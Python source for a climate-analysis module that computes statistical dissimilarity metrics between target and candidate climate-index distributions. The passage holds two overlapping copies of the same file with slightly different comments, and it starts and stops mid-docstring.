        dataset's `data_vars`. They should have only the dimension(s) `dist_dim` in common with `candidates`.
    candidates : xr.Dataset
        Dataset of the candidate indices. Only index variables should be included in
        the dataset's `data_vars`.
    dist_dim : str
        The dimension over which the *distributions* are constructed. This can be a multi-index dimension.
    method : {'seuclidean', 'nearest_neighbor', 'zech_aslan', 'kolmogorov_smirnov', 'friedman_rafsky', 'kldiv'}
        Which method to use when computing the dissimilarity statistic.
    **kwargs
        Any other parameter passed directly to the dissimilarity method.

    Returns
    -------
    xr.DataArray
        The dissimilarity statistic over the union of candidates' and target's dimensions.
    """
    if parse_version(__scipy_version__) < parse_version("1.6.0") and method in [
        "kldiv",
        "nearest_neighbor",
    ]:
        raise RuntimeError(f"Spatial analog method ({method}) requires scipy>=1.6.0.")

    # Create the target DataArray: stack every indicator variable along a new
    # "indices" dimension.
    target = xr.concat(
        target.data_vars.values(),
        xr.DataArray(list(target.data_vars.keys()), dims=("indices",), name="indices"),
    )

    # Create the candidate DataArray with a renamed dist_dim so it does not
    # collide with the target's distribution dimension when broadcasting.
    c_dist_dim = "candidate_dist_dim"
    candidates = xr.concat(
        candidates.data_vars.values(),
        xr.DataArray(
            list(candidates.data_vars.keys()),
            dims=("indices",),
            name="indices",
        ),
    ).rename({dist_dim: c_dist_dim})

    try:
        metric = metrics[method]
    except KeyError:
        # FIX: build the joined list outside the f-string. Re-using the same
        # quote character inside an f-string is a SyntaxError before
        # Python 3.12 (PEP 701). The message text itself is unchanged.
        available = ",".join(metrics.keys())
        raise ValueError(
            f"Method {method} is not implemented. Available methods are : {available}."
        )

    # Compute dissimilarity
    diss = xr.apply_ufunc(
        metric,
        target,
        candidates,
        input_core_dims=[(dist_dim, "indices"), (c_dist_dim, "indices")],
        output_core_dims=[()],
        vectorize=True,
        dask="parallelized",
        output_dtypes=[float],
        **kwargs,
    )
    diss.name = "dissimilarity"
    diss.attrs.update(
        long_name=f"Dissimilarity between target and candidates, using metric {method}.",
        indices=",".join(target.indices.values),
        metric=method,
    )
    return diss
# ---------------------------------------------------------------------------- #
# -------------------------- Utility functions ------------------------------- #
# ---------------------------------------------------------------------------- #
def standardize(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
    """
    Standardize x and y by the square root of the product of their standard deviation.

    The standard deviations are taken along axis 0 with ddof=1 (sample std).

    Parameters
    ----------
    x: np.ndarray
        Array to be compared.
    y: np.ndarray
        Array to be compared.

    Returns
    -------
    (ndarray, ndarray)
        Standardized arrays.
    """
    x_std = x.std(0, ddof=1)
    y_std = y.std(0, ddof=1)
    scale = np.sqrt(x_std * y_std)
    return x / scale, y / scale
def metric(func):
    """Register a metric function in the `metrics` mapping and add some preparation/checking code.

    All metric functions accept 2D inputs. This reshapes 1D inputs to (n, 1) and (m, 1).
    All metric functions are invalid when any non-finite values are present in the inputs.
    """

    @wraps(func)
    def _metric_overhead(x, y, **kwargs):
        # Any NaN in either sample invalidates the metric.
        if np.any(np.isnan(x)) or np.any(np.isnan(y)):
            # FIX: np.nan instead of np.NaN — the NaN alias was removed in
            # NumPy 2.0 (same float value, forward-compatible spelling).
            return np.nan

        x = np.atleast_2d(x)
        y = np.atleast_2d(y)

        # If array is 1D, flip it into a column vector.
        if x.shape[0] == 1:
            x = x.T
        if y.shape[0] == 1:
            y = y.T

        if x.shape[1] != y.shape[1]:
            raise AttributeError("Shape mismatch")

        return func(x, y, **kwargs)

    metrics[func.__name__] = _metric_overhead
    return _metric_overhead
# ---------------------------------------------------------------------------- #
# ------------------------ Dissimilarity metrics ----------------------------- #
# ---------------------------------------------------------------------------- #
@metric
def seuclidean(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Euclidean distance between the mean of a multivariate candidate sample with respect to the mean of a reference sample.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Standardized Euclidean Distance between the mean of the samples
        ranging from 0 to infinity.

    Notes
    -----
    This metric considers neither the information from individual points nor
    the standard deviation of the candidate distribution.

    References
    ----------
    Veloz et al. (2011) Identifying climatic analogs for Wisconsin under
    21st-century climate-change scenarios. Climatic Change,
    DOI 10.1007/s10584-011-0261-z.
    """
    # Compare sample means only, scaled by the reference sample's variance.
    ref_mean = x.mean(axis=0)
    cand_mean = y.mean(axis=0)
    ref_var = x.var(axis=0, ddof=1)
    return spatial.distance.seuclidean(ref_mean, cand_mean, ref_var)
@metric
def nearest_neighbor(x: np.ndarray, y: np.ndarray) -> np.ndarray:
    """
    Compute a dissimilarity metric based on the number of points in the pooled sample whose nearest neighbor belongs to the same distribution.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Nearest-Neighbor dissimilarity metric ranging from 0 to 1.

    References
    ----------
    Henze N. (1988) A Multivariate two-sample test based on the number of
    nearest neighbor type coincidences. Ann. of Stat., Vol. 16, No.2, 772-783.
    """
    x, y = standardize(x, y)
    n_ref = x.shape[0]

    # Pool both samples; query k=2 because each point's closest hit is itself
    # (distance 0), so the second hit is the true nearest neighbour.
    pooled = np.concatenate([x, y], axis=0)
    _, hits = KDTree(pooled).query(pooled, k=2, eps=0, p=2, workers=2)

    # A point and its nearest neighbour come from the same sample exactly when
    # both indices fall on the same side of n_ref.
    from_ref = hits < n_ref
    same = from_ref[:, 0] == from_ref[:, 1]
    return same.mean()
@metric
def zech_aslan(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Zech-Aslan energy distance dissimilarity metric based on an analogy with the energy of a cloud of electrical charges.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Zech-Aslan dissimilarity metric ranging from -infinity to infinity.

    References
    ----------
    Zech G. and Aslan B. (2003) A Multivariate two-sample test based on the
    concept of minimum energy. PHYStat2003, SLAC, Stanford, CA, Sep 8-11.
    Aslan B. and Zech G. (2008) A new class of binning-free, multivariate
    goodness-of-fit tests: the energy tests. arXiV:hep-ex/0203010v5.
    """
    nx, d = x.shape
    ny, d = y.shape

    # Per-index scaling: product of both samples' standard deviations.
    v = (x.std(axis=0, ddof=1) * y.std(axis=0, ddof=1)).astype(np.double)

    # Pairwise standardized Euclidean distances within each sample and
    # between the two samples.
    dx = spatial.distance.pdist(x, "seuclidean", V=v)
    dy = spatial.distance.pdist(y, "seuclidean", V=v)
    dxy = spatial.distance.cdist(x, y, "seuclidean", V=v)

    # "Potential energies": within-sample terms carry a negative sign, the
    # cross-sample term a positive one; their sum is the energy statistic.
    phix = -np.log(dx).sum() / nx / (nx - 1)
    phiy = -np.log(dy).sum() / ny / (ny - 1)
    phixy = np.log(dxy).sum() / nx / ny
    return phix + phiy + phixy
@metric
def skezely_rizzo(x, y):
    """
    Compute the Skezely-Rizzo energy distance dissimilarity metric based on an analogy with the energy of a cloud of electrical charges.

    .. note:: Not implemented yet; calling this metric raises ``NotImplementedError``.

    Parameters
    ----------
    x : ndarray (n,d)
        Reference sample.
    y : ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Skezely-Rizzo dissimilarity metric ranging from -infinity to infinity.

    References
    ----------
    TODO
    """
    raise NotImplementedError
    # Draft implementation kept for reference; it mirrors zech_aslan up to the
    # final combination step (last three commented lines).
    # nx, d = x.shape
    # ny, d = y.shape
    #
    # v = x.std(0, ddof=1) * y.std(0, ddof=1)
    #
    # dx = spatial.distance.pdist(x, 'seuclidean', V=v)
    # dy = spatial.distance.pdist(y, 'seuclidean', V=v)
    # dxy = spatial.distance.cdist(x, y, 'seuclidean', V=v)
    #
    # phix = -np.log(dx).sum() / nx / (nx - 1)
    # phiy = -np.log(dy).sum() / ny / (ny - 1)
    # phixy = np.log(dxy).sum() / nx / ny
    # z = dxy.sum() * 2. / (nx*ny) - (1./nx**2) *
    # z = (2 / (n * m)) * sum(dxy(:)) - (1 / (n ^ 2)) * sum(2 * dx) - (1 /
    # (m ^ 2)) * sum(2 * dy);
    # z = ((n * m) / (n + m)) * z;
@metric
def friedman_rafsky(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute a dissimilarity metric based on the Friedman-Rafsky runs statistics.

    The algorithm builds a minimal spanning tree (the subset of edges
    connecting all points that minimizes the total edge length) then counts
    the edges linking points from the same distribution.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Friedman-Rafsky dissimilarity metric ranging from 0 to (m+n-1)/(m+n).

    References
    ----------
    Friedman J.H. and Rafsky L.C. (1979) Multivariate generalizations of the
    Wald-Wolfowitz and Smirnov two-sample tests. Annals of Stat. Vol.7, No. 4, 697-717.
    """
    # Function-level imports: sklearn is only required when this metric is used.
    from scipy.sparse.csgraph import minimum_spanning_tree
    from sklearn import neighbors

    nx, _ = x.shape
    ny, _ = y.shape
    n = nx + ny
    # Pool the two samples; rows < nx belong to the reference sample.
    xy = np.vstack([x, y])
    # Compute the NNs and the minimum spanning tree
    g = neighbors.kneighbors_graph(xy, n_neighbors=n - 1, mode="distance")
    mst = minimum_spanning_tree(g, overwrite=True)
    # MST edges as (row, col) index pairs into the pooled array.
    edges = np.array(mst.nonzero()).T
    # Number of points whose neighbor is from the other sample
    diff = np.logical_xor(*(edges < nx).T).sum()
    return 1.0 - (1.0 + diff) / n
@metric
def kolmogorov_smirnov(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Kolmogorov-Smirnov statistic applied to two multivariate samples as described by Fasano and Franceschini.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Kolmogorov-Smirnov dissimilarity metric ranging from 0 to 1.

    References
    ----------
    Fasano G. and Francheschini A. (1987) A multidimensional version
    of the Kolmogorov-Smirnov test. Monthly Notices of the Royal Astronomical Society, vol. 225, pp. 155-170.
    """

    def pivot(x, y):
        # Maximum empirical-CDF difference over the 2**d orthants anchored at
        # each point of x.
        nx, d = x.shape
        ny, d = y.shape

        # Multiplicative factor converting d-dim booleans to a unique integer.
        mf = (2 ** np.arange(d)).reshape(1, d, 1)
        minlength = 2 ** d

        # Assign a unique integer according on whether or not x[i] <= sample
        ix = ((x.T <= np.atleast_3d(x)) * mf).sum(1)
        iy = ((x.T <= np.atleast_3d(y)) * mf).sum(1)

        # Count the number of samples in each quadrant
        cx = 1.0 * np.apply_along_axis(np.bincount, 0, ix, minlength=minlength) / nx
        cy = 1.0 * np.apply_along_axis(np.bincount, 0, iy, minlength=minlength) / ny

        # This is from https://github.com/syrte/ndtest/blob/master/ndtest.py
        # D = cx - cy
        # D[0,:] -= 1. / nx  # I don't understand this...
        # dmin, dmax = -D.min(), D.max() + .1 / nx
        return np.max(np.abs(cx - cy))

    # The statistic is not symmetric in (x, y): take the max over both
    # choices of pivot sample.
    return max(pivot(x, y), pivot(y, x))
@metric
def kldiv(
    x: np.ndarray, y: np.ndarray, *, k: Union[int, Sequence[int]] = 1
) -> Union[float, Sequence[float]]:
    r"""
    Compute the Kullback-Leibler divergence between two multivariate samples.

    .. math::
        D(P||Q) = \frac{d}{n} \sum_i^n \log{\frac{r_k(x_i)}{s_k(x_i)}} + \log{\frac{m}{n-1}}

    where :math:`r_k(x_i)` and :math:`s_k(x_i)` are, respectively, the euclidean distance
    to the kth neighbour of x_i in the x array (excepting x_i) and
    in the y array.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Samples from distribution P, which typically represents the true
        distribution (reference).
    y : np.ndarray (m,d)
        Samples from distribution Q, which typically represents the
        approximate distribution (candidate)
    k : int or sequence
        The kth neighbours to look for when estimating the density of the
        distributions. Defaults to 1, which can be noisy.

    Returns
    -------
    float or sequence
        The estimated Kullback-Leibler divergence D(P||Q) computed from
        the distances to the kth neighbour.

    Notes
    -----
    In information theory, the Kullback–Leibler divergence is a non-symmetric
    measure of the difference between two probability distributions P and Q,
    where P is the "true" distribution and Q an approximation. This nuance is
    important because D(P||Q) is not equal to D(Q||P).

    For probability distributions P and Q of a continuous random variable,
    the K–L divergence is defined as:

    .. math::
        D_{KL}(P||Q) = \int p(x) \log{\frac{p(x)}{q(x)}} dx

    This formula assumes we have a representation of the probability
    densities p(x) and q(x). In many cases, we only have samples from the
    distribution, and most methods first estimate the densities from the
    samples and then proceed to compute the K-L divergence. In Perez-Cruz,
    the authors propose an algorithm to estimate the K-L divergence directly
    from the sample using an empirical CDF. Even though the CDFs do not
    converge to their true values, the paper proves that the K-L divergence
    almost surely does converge to its true value.

    References
    ----------
    Kullback-Leibler Divergence Estimation of Continuous Distributions (2008).
    Fernando Pérez-Cruz.
    """
    # mk: whether the caller asked for several k values (and hence a list back).
    mk = np.iterable(k)
    ka = np.atleast_1d(k)
    nx, d = x.shape
    ny, d = y.shape
    # Limit the number of dimensions to 10, too slow otherwise.
    if d > 10:
        raise ValueError("Too many dimensions: {}.".format(d))
    # Not enough data to draw conclusions.
    if nx < 5 or ny < 5:
        return np.nan if not mk else [np.nan] * len(k)
    # Build a KD tree representation of the samples.
    xtree = KDTree(x)
    ytree = KDTree(y)
    # Get the k'th nearest neighbour from each points in x for both x and y.
    # We get the values for K + 1 to make sure the output is a 2D array.
    kmax = max(ka) + 1
    r, _ = xtree.query(x, k=kmax, eps=0, p=2, workers=2)
    s, _ = ytree.query(x, k=kmax, eps=0, p=2, workers=2)
    # There is a mistake in the paper. In Eq. 14, the right side misses a
    # negative sign on the first term of the right hand side.
    out = list()
    for ki in ka:
        # The 0th nearest neighbour of x[i] in x is x[i] itself.
        # Hence we take the k'th + 1, which in 0-based indexing is given by
        # index k. For distances in y there is no self-match, so index ki - 1.
        out.append(
            -np.log(r[:, ki] / s[:, ki - 1]).sum() * d / nx + np.log(ny / (nx - 1.0))
        )
    if mk:
        return out
    return out[0]
| # -*- encoding: utf8 -*-
# noqa: D205,D400
"""
Spatial analogs
===============
Spatial analogues are maps showing which areas have a present-day climate that is analogous
to the future climate of a given place. This type of map can be useful for climate adaptation
to see how well regions are coping today under specific climate conditions. For example,
officials from a city located in a temperate region that may be expecting more heatwaves in
the future can learn from the experience of another city where heatwaves are a common occurrence,
leading to more proactive intervention plans to better deal with new climate conditions.
Spatial analogues are estimated by comparing the distribution of climate indices computed at
the target location over the future period with the distribution of the same climate indices
computed over a reference period for multiple candidate regions. A number of methodological
choices thus enter the computation:
- Climate indices of interest,
- Metrics measuring the difference between both distributions,
- Reference data from which to compute the base indices,
- A future climate scenario to compute the target indices.
The climate indices chosen to compute the spatial analogues are usually annual values of
indices relevant to the intended audience of these maps. For example, in the case of the
wine grape industry, the climate indices examined could include the length of the frost-free
season, growing degree-days, annual winter minimum temperature and annual number of
very cold days [Roy2017]_.
Methods to compute the (dis)similarity between samples
------------------------------------------------------
This module implements five of the six methods described in [Grenier2013]_ to measure
the dissimilarity between two samples. Some of these algorithms can be used to
test whether or not two samples have been drawn from the same distribution.
Here, they are used to find areas with analog climate conditions to a target
climate.
Methods available
~~~~~~~~~~~~~~~~~
* Standardized Euclidean distance
* Nearest Neighbour distance
* Zech-Aslan energy statistic
* Friedman-Rafsky runs statistic
* Kolmogorov-Smirnov statistic
* Kullback-Leibler divergence
All methods accept arrays, the first is the reference (n, D) and
the second is the candidate (m, D). Where the climate indicators
vary along D and the distribution dimension along n or m. All methods output
a single float.
.. rubric:: References
.. [Roy2017] Roy, P., Grenier, P., Barriault, E. et al. Climatic Change (2017) 143: 43. `<doi:10.1007/s10584-017-1960-x>`_
.. [Grenier2013] Grenier, P., A.-C. Parent, D. Huard, F. Anctil, and D. Chaumont, 2013: An assessment of six dissimilarity metrics for climate analogs. J. Appl. Meteor. Climatol., 52, 733–752, `<doi:10.1175/JAMC-D-12-0170.1>`_
"""
# Code adapted from flyingpigeon.dissimilarity, Nov 2020.
from typing import Sequence, Tuple, Union
import numpy as np
import xarray as xr
from boltons.funcutils import wraps
from pkg_resources import parse_version
from scipy import __version__ as __scipy_version__
from scipy import spatial
from scipy.spatial import cKDTree as KDTree
# TODO: Szekely, G, Rizzo, M (2014) Energy statistics: A class of statistics
# based on distances. J Stat Planning & Inference 143: 1249-1272
# TODO: Hellinger distance

# Registry of dissimilarity metrics, populated by the `metric` decorator below.
metrics = {}
def spatial_analogs(
    target: xr.Dataset,
    candidates: xr.Dataset,
    dist_dim: Union[str, Sequence[str]] = "time",
    method: str = "kldiv",
    **kwargs,
):
    """Compute dissimilarity statistics between target points and candidate points.

    Spatial analogs based on the comparison of climate indices. The algorithm compares
    the distribution of the reference indices with the distribution of spatially
    distributed candidate indices and returns a value measuring the dissimilarity
    between both distributions over the candidate grid.

    Parameters
    ----------
    target : xr.Dataset
        Dataset of the target indices. Only indice variables should be included in the
        dataset's `data_vars`. They should have only the dimension(s) `dist_dim` in common with `candidates`.
    candidates : xr.Dataset
        Dataset of the candidate indices. Only indice variables should be included in
        the dataset's `data_vars`.
    dist_dim : str
        The dimension over which the *distributions* are constructed. This can be a multi-index dimension.
    method : {'seuclidean', 'nearest_neighbor', 'zech_aslan', 'kolmogorov_smirnov', 'friedman_rafsky', 'kldiv'}
        Which method to use when computing the dissimilarity statistic.
    **kwargs
        Any other parameter passed directly to the dissimilarity method.

    Returns
    -------
    xr.DataArray
        The dissimilarity statistic over the union of candidates' and target's dimensions.

    Raises
    ------
    RuntimeError
        If the scipy version is too old for the requested method.
    ValueError
        If `method` is not a registered metric.
    """
    # These two methods rely on cKDTree.query(..., workers=...), which was
    # added in scipy 1.6.0.
    if parse_version(__scipy_version__) < parse_version("1.6.0") and method in [
        "kldiv",
        "nearest_neighbor",
    ]:
        raise RuntimeError(f"Spatial analog method ({method}) requires scipy>=1.6.0.")

    # Create the target DataArray: stack all indice variables along a new
    # "indices" dimension.
    target = xr.concat(
        target.data_vars.values(),
        xr.DataArray(list(target.data_vars.keys()), dims=("indices",), name="indices"),
    )

    # Create the candidate DataArray, renaming its distribution dimension so
    # apply_ufunc treats the target and candidate distributions independently.
    # NOTE(review): `rename` uses `dist_dim` as a single key, so despite the
    # annotation a Sequence value would fail here — confirm intended support.
    c_dist_dim = "candidate_dist_dim"
    candidates = xr.concat(
        candidates.data_vars.values(),
        xr.DataArray(
            list(candidates.data_vars.keys()),
            dims=("indices",),
            name="indices",
        ),
    ).rename({dist_dim: c_dist_dim})

    try:
        metric = metrics[method]
    except KeyError as err:
        # Chain explicitly so the original KeyError is shown as the cause
        # rather than as an unrelated error raised during handling.
        raise ValueError(
            f"Method {method} is not implemented. Available methods are : {','.join(metrics.keys())}."
        ) from err

    # Compute dissimilarity
    diss = xr.apply_ufunc(
        metric,
        target,
        candidates,
        input_core_dims=[(dist_dim, "indices"), (c_dist_dim, "indices")],
        output_core_dims=[()],
        vectorize=True,
        dask="parallelized",
        output_dtypes=[float],
        **kwargs,
    )
    diss.name = "dissimilarity"
    diss.attrs.update(
        long_name=f"Dissimilarity between target and candidates, using metric {method}.",
        indices=",".join(target.indices.values),
        metric=method,
    )
    return diss
# ---------------------------------------------------------------------------- #
# -------------------------- Utility functions ------------------------------- #
# ---------------------------------------------------------------------------- #
def standardize(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
    """
    Scale two samples by the square root of the product of their standard deviations.

    Both arrays are divided by ``sqrt(std(x) * std(y))``, the per-column sample
    standard deviations (``ddof=1``) being taken along the first axis.

    Parameters
    ----------
    x: np.ndarray
        Array to be compared.
    y: np.ndarray
        Array to be compared.

    Returns
    -------
    (ndarray, ndarray)
        Standardized arrays.
    """
    scale = np.sqrt(x.std(0, ddof=1) * y.std(0, ddof=1))
    return x / scale, y / scale
def metric(func):
    """Register a metric function in the `metrics` mapping and add some preparation/checking code.

    All metric functions accept 2D inputs. This reshapes 1D inputs to (n, 1) and (m, 1).
    All metric functions are invalid when any non-finite values are present in the inputs.
    """

    @wraps(func)
    def _metric_overhead(x, y, **kwargs):
        # Metrics are undefined in the presence of missing values.
        # Use np.nan: the np.NaN alias was removed in NumPy 2.0.
        if np.any(np.isnan(x)) or np.any(np.isnan(y)):
            return np.nan

        x = np.atleast_2d(x)
        y = np.atleast_2d(y)

        # atleast_2d turns a 1D vector into a (1, n) row; transpose it so the
        # sample dimension comes first, as the metrics expect.
        if x.shape[0] == 1:
            x = x.T
        if y.shape[0] == 1:
            y = y.T

        # Both samples must share the same number of indices (columns).
        if x.shape[1] != y.shape[1]:
            raise AttributeError("Shape mismatch")
        return func(x, y, **kwargs)

    metrics[func.__name__] = _metric_overhead
    return _metric_overhead
# ---------------------------------------------------------------------------- #
# ------------------------ Dissimilarity metrics ----------------------------- #
# ---------------------------------------------------------------------------- #
@metric
def seuclidean(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Euclidean distance between the mean of a multivariate candidate sample with respect to the mean of a reference sample.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Standardized Euclidean Distance between the mean of the samples
        ranging from 0 to infinity.

    Notes
    -----
    This metric considers neither the information from individual points nor
    the standard deviation of the candidate distribution.

    References
    ----------
    Veloz et al. (2011) Identifying climatic analogs for Wisconsin under
    21st-century climate-change scenarios. Climatic Change,
    DOI 10.1007/s10584-011-0261-z.
    """
    # Compare sample means only, scaled by the reference sample's variance.
    ref_mean = x.mean(axis=0)
    cand_mean = y.mean(axis=0)
    ref_var = x.var(axis=0, ddof=1)
    return spatial.distance.seuclidean(ref_mean, cand_mean, ref_var)
@metric
def nearest_neighbor(x: np.ndarray, y: np.ndarray) -> np.ndarray:
    """
    Compute a dissimilarity metric based on the number of points in the pooled sample whose nearest neighbor belongs to the same distribution.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Nearest-Neighbor dissimilarity metric ranging from 0 to 1.

    References
    ----------
    Henze N. (1988) A Multivariate two-sample test based on the number of
    nearest neighbor type coincidences. Ann. of Stat., Vol. 16, No.2, 772-783.
    """
    x, y = standardize(x, y)
    n_ref = x.shape[0]

    # Pool both samples; query k=2 because each point's closest hit is itself
    # (distance 0), so the second hit is the true nearest neighbour.
    pooled = np.concatenate([x, y], axis=0)
    _, hits = KDTree(pooled).query(pooled, k=2, eps=0, p=2, workers=2)

    # A point and its nearest neighbour come from the same sample exactly when
    # both indices fall on the same side of n_ref.
    from_ref = hits < n_ref
    same = from_ref[:, 0] == from_ref[:, 1]
    return same.mean()
@metric
def zech_aslan(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Zech-Aslan energy distance dissimilarity metric based on an analogy with the energy of a cloud of electrical charges.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Zech-Aslan dissimilarity metric ranging from -infinity to infinity.

    References
    ----------
    Zech G. and Aslan B. (2003) A Multivariate two-sample test based on the
    concept of minimum energy. PHYStat2003, SLAC, Stanford, CA, Sep 8-11.
    Aslan B. and Zech G. (2008) A new class of binning-free, multivariate
    goodness-of-fit tests: the energy tests. arXiV:hep-ex/0203010v5.
    """
    nx, d = x.shape
    ny, d = y.shape

    # Per-index scaling: product of both samples' standard deviations.
    v = (x.std(axis=0, ddof=1) * y.std(axis=0, ddof=1)).astype(np.double)

    # Pairwise standardized Euclidean distances within each sample and
    # between the two samples.
    dx = spatial.distance.pdist(x, "seuclidean", V=v)
    dy = spatial.distance.pdist(y, "seuclidean", V=v)
    dxy = spatial.distance.cdist(x, y, "seuclidean", V=v)

    # "Potential energies": within-sample terms carry a negative sign, the
    # cross-sample term a positive one; their sum is the energy statistic.
    phix = -np.log(dx).sum() / nx / (nx - 1)
    phiy = -np.log(dy).sum() / ny / (ny - 1)
    phixy = np.log(dxy).sum() / nx / ny
    return phix + phiy + phixy
@metric
def skezely_rizzo(x, y):
    """
    Compute the Skezely-Rizzo energy distance dissimilarity metric based on an analogy with the energy of a cloud of electrical charges.

    .. note:: Not implemented yet; calling this metric raises ``NotImplementedError``.

    Parameters
    ----------
    x : ndarray (n,d)
        Reference sample.
    y : ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Skezely-Rizzo dissimilarity metric ranging from -infinity to infinity.

    References
    ----------
    TODO
    """
    raise NotImplementedError
    # Draft implementation kept for reference; it mirrors zech_aslan up to the
    # final combination step (last three commented lines).
    # nx, d = x.shape
    # ny, d = y.shape
    #
    # v = x.std(0, ddof=1) * y.std(0, ddof=1)
    #
    # dx = spatial.distance.pdist(x, 'seuclidean', V=v)
    # dy = spatial.distance.pdist(y, 'seuclidean', V=v)
    # dxy = spatial.distance.cdist(x, y, 'seuclidean', V=v)
    #
    # phix = -np.log(dx).sum() / nx / (nx - 1)
    # phiy = -np.log(dy).sum() / ny / (ny - 1)
    # phixy = np.log(dxy).sum() / nx / ny
    # z = dxy.sum() * 2. / (nx*ny) - (1./nx**2) *
    # z = (2 / (n * m)) * sum(dxy(:)) - (1 / (n ^ 2)) * sum(2 * dx) - (1 /
    # (m ^ 2)) * sum(2 * dy);
    # z = ((n * m) / (n + m)) * z;
@metric
def friedman_rafsky(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute a dissimilarity metric based on the Friedman-Rafsky runs statistics.

    The algorithm builds a minimal spanning tree (the subset of edges
    connecting all points that minimizes the total edge length) then counts
    the edges linking points from the same distribution.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Friedman-Rafsky dissimilarity metric ranging from 0 to (m+n-1)/(m+n).

    References
    ----------
    Friedman J.H. and Rafsky L.C. (1979) Multivariate generalizations of the
    Wald-Wolfowitz and Smirnov two-sample tests. Annals of Stat. Vol.7, No. 4, 697-717.
    """
    # Function-level imports: sklearn is only required when this metric is used.
    from scipy.sparse.csgraph import minimum_spanning_tree
    from sklearn import neighbors

    nx, _ = x.shape
    ny, _ = y.shape
    n = nx + ny
    # Pool the two samples; rows < nx belong to the reference sample.
    xy = np.vstack([x, y])
    # Compute the NNs and the minimum spanning tree
    g = neighbors.kneighbors_graph(xy, n_neighbors=n - 1, mode="distance")
    mst = minimum_spanning_tree(g, overwrite=True)
    # MST edges as (row, col) index pairs into the pooled array.
    edges = np.array(mst.nonzero()).T
    # Number of points whose neighbor is from the other sample
    diff = np.logical_xor(*(edges < nx).T).sum()
    return 1.0 - (1.0 + diff) / n
@metric
def kolmogorov_smirnov(x: np.ndarray, y: np.ndarray) -> float:
    """
    Compute the Kolmogorov-Smirnov statistic applied to two multivariate samples as described by Fasano and Franceschini.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Reference sample.
    y : np.ndarray (m,d)
        Candidate sample.

    Returns
    -------
    float
        Kolmogorov-Smirnov dissimilarity metric ranging from 0 to 1.

    References
    ----------
    Fasano G. and Francheschini A. (1987) A multidimensional version
    of the Kolmogorov-Smirnov test. Monthly Notices of the Royal Astronomical Society, vol. 225, pp. 155-170.
    """

    def pivot(x, y):
        # Maximum empirical-CDF difference over the 2**d orthants anchored at
        # each point of x.
        nx, d = x.shape
        ny, d = y.shape

        # Multiplicative factor converting d-dim booleans to a unique integer.
        mf = (2 ** np.arange(d)).reshape(1, d, 1)
        minlength = 2 ** d

        # Assign a unique integer according on whether or not x[i] <= sample
        ix = ((x.T <= np.atleast_3d(x)) * mf).sum(1)
        iy = ((x.T <= np.atleast_3d(y)) * mf).sum(1)

        # Count the number of samples in each quadrant
        cx = 1.0 * np.apply_along_axis(np.bincount, 0, ix, minlength=minlength) / nx
        cy = 1.0 * np.apply_along_axis(np.bincount, 0, iy, minlength=minlength) / ny

        # This is from https://github.com/syrte/ndtest/blob/master/ndtest.py
        # D = cx - cy
        # D[0,:] -= 1. / nx  # I don't understand this...
        # dmin, dmax = -D.min(), D.max() + .1 / nx
        return np.max(np.abs(cx - cy))

    # The statistic is not symmetric in (x, y): take the max over both
    # choices of pivot sample.
    return max(pivot(x, y), pivot(y, x))
@metric
def kldiv(
    x: np.ndarray, y: np.ndarray, *, k: Union[int, Sequence[int]] = 1
) -> Union[float, Sequence[float]]:
    r"""
    Compute the Kullback-Leibler divergence between two multivariate samples.

    .. math::
        D(P||Q) = \frac{d}{n} \sum_i^n \log{\frac{r_k(x_i)}{s_k(x_i)}} + \log{\frac{m}{n-1}}

    where :math:`r_k(x_i)` and :math:`s_k(x_i)` are, respectively, the euclidean distance
    to the kth neighbour of x_i in the x array (excepting x_i) and
    in the y array.

    Parameters
    ----------
    x : np.ndarray (n,d)
        Samples from distribution P, which typically represents the true
        distribution (reference).
    y : np.ndarray (m,d)
        Samples from distribution Q, which typically represents the
        approximate distribution (candidate)
    k : int or sequence
        The kth neighbours to look for when estimating the density of the
        distributions. Defaults to 1, which can be noisy.

    Returns
    -------
    float or sequence
        The estimated Kullback-Leibler divergence D(P||Q) computed from
        the distances to the kth neighbour.

    Notes
    -----
    In information theory, the Kullback–Leibler divergence is a non-symmetric
    measure of the difference between two probability distributions P and Q,
    where P is the "true" distribution and Q an approximation. This nuance is
    important because D(P||Q) is not equal to D(Q||P).

    For probability distributions P and Q of a continuous random variable,
    the K–L divergence is defined as:

    .. math::
        D_{KL}(P||Q) = \int p(x) \log{\frac{p(x)}{q(x)}} dx

    This formula assumes we have a representation of the probability
    densities p(x) and q(x). In many cases, we only have samples from the
    distribution, and most methods first estimate the densities from the
    samples and then proceed to compute the K-L divergence. In Perez-Cruz,
    the authors propose an algorithm to estimate the K-L divergence directly
    from the sample using an empirical CDF. Even though the CDFs do not
    converge to their true values, the paper proves that the K-L divergence
    almost surely does converge to its true value.

